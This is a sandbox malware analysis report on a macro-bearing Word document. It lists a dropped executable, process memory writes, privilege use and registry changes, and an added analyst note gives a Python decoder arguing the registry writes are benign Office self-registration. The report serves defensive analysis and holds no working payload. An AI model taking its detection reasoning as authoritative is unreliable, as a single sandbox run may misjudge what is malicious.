Malware Analysis Report

2024-10-24 21:48

Sample ID 240520-ex2ehaca5x
Target 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118
SHA256 54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
Tags
macro macro_on_action
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0

Threat Level: Likely malicious

The file 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

macro macro_on_action

Office macro that triggers on suspicious action

Suspicious Office macro

Executes dropped EXE

Loads dropped DLL

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks processor information in registry

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-20 04:19

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-20 04:19

Reported

2024-05-20 04:22

Platform

win7-20240220-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
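
Analyst note (added to this page; not part of the sandbox output). The long hex strings written as REG_BINARY "command" values above (the ...\shell\edit\command\command entries in both the "Modifies Internet Explorer settings" and "Modifies registry class" tables) are UTF-16LE text in the Windows Installer Darwin descriptor format: a 20-character base-85 compressed product code, a feature name, ">", a 20-character compressed component ID, then the command arguments. The shell hands such a descriptor to MSI so the registered component can be installed or repaired on demand. Decoded, the Word value carries the Office 2010 product code {90140000-0011-0000-0000-0000000FF1CE}, the feature WORDFiles and the arguments /n "%1", i.e. the same command as the plain string value written beside it; the Excel and Publisher values decode the same way to /dde and %1. Every key points at Office14 binaries, so this churn is Word registering itself as the HTML/MHTML editor on first run in the sandbox, and the "adware spyware" tag on that signature should be weighed accordingly rather than read as attacker persistence. The decoder below is example code written for this page, not Triage's; the alphabet and layout are Windows Installer's compressed-GUID scheme, and the two hex constants are the report's values regrouped one UTF-16 code unit per group for readability.

```python
import struct

# Base-85 alphabet Windows Installer uses for the "compressed" GUIDs inside a
# Darwin descriptor (the advertised-component string the shell hands to MSI).
DARWIN_ALPHABET = ("!$%&'()*+,-.0123456789=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                   "[]^_`abcdefghijklmnopqrstuvwxyz{}~")
_DIGIT = {ch: i for i, ch in enumerate(DARWIN_ALPHABET)}   # 85 symbols

# REG_BINARY 'command' data copied from the report (UTF-16LE), regrouped as one
# code unit per 4 hex digits; bytes.fromhex() ignores the whitespace.
WORD_HTM_COMMAND_HEX = """
7800 6200 2700 4200 5600 3500 2100 2100
2100 2100 2100 2100 2100 2100 2100 4d00
4b00 4b00 5300 6b00 5700 4f00 5200 4400
4600 6900 6c00 6500 7300 3e00 6200 6900
2400 5400 2100 5600 2100 3000 5a00 3d00
7b00 5000 6b00 3000 7600 6d00 7e00 4100
5a00 7500 2000 2f00 6e00 2000 2200 2500
3100 2200 0000 0000
"""
EXCEL_HTM_COMMAND_HEX = """
7800 6200 2700 4200 5600 3500 2100 2100
2100 2100 2100 2100 2100 2100 2100 4d00
4b00 4b00 5300 6b00 4500 5800 4300 4500
4c00 4600 6900 6c00 6500 7300 3e00 5600
6900 6a00 7100 4200 6f00 6600 2800 5900
3800 2700 7700 2100 4600 4900 6400 3100
6700 4c00 5100 2000 2f00 6400 6400 6500
0000 0000
"""


def decompress_guid(token: str) -> str:
    """Expand a 20-character compressed GUID to {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}."""
    if len(token) != 20 or any(ch not in _DIGIT for ch in token):
        raise ValueError("not a 20-character Darwin-compressed GUID: %r" % token)
    dwords = []
    for i in range(0, 20, 5):
        value = 0
        for ch in reversed(token[i:i + 5]):      # little-endian base 85
            value = value * 85 + _DIGIT[ch]
        dwords.append(value)
    d1, d2, d3, d4 = dwords
    data4 = struct.pack("<II", d3, d4)           # Data4 bytes in storage order
    return "{%08X-%04X-%04X-%s-%s}" % (
        d1, d2 & 0xFFFF, d2 >> 16,
        data4[:2].hex().upper(), data4[2:].hex().upper())


def decode_darwin_descriptor(reg_hex: str) -> dict:
    """Split a UTF-16LE Darwin descriptor into product, feature, component and arguments."""
    text = bytes.fromhex(reg_hex).decode("utf-16-le").rstrip("\x00")
    head, sep, tail = text.partition(">")
    if not sep or len(head) < 20 or len(tail) < 20:
        raise ValueError("value is not laid out as <product><feature>><component><args>")
    return {
        "product_code": decompress_guid(head[:20]),
        "feature": head[20:],
        "component_id": decompress_guid(tail[:20]),
        "arguments": tail[20:],
    }


def office_major_version(product_code: str):
    """Office MSI product codes look like {90MM0000-00xx-0000-0000-0000000FF1CE}; MM is the
    major version (14 = Office 2010). Returns None for anything else."""
    pc = product_code.upper()
    if not (pc.startswith("{90") and pc.endswith("0FF1CE}")):
        return None
    return int(pc[3:5])


if __name__ == "__main__":
    for label, hx in (("Word .htm edit", WORD_HTM_COMMAND_HEX),
                      ("Excel .htm edit", EXCEL_HTM_COMMAND_HEX)):
        d = decode_darwin_descriptor(hx)
        print(label, d, "Office major version:", office_major_version(d["product_code"]))
```

The component IDs decode too, but only the product code, feature and trailing arguments are needed to tell an Office self-registration from a value an attacker planted: a planted value would point outside the Office product code or carry arguments that do not match the adjacent string command.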

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
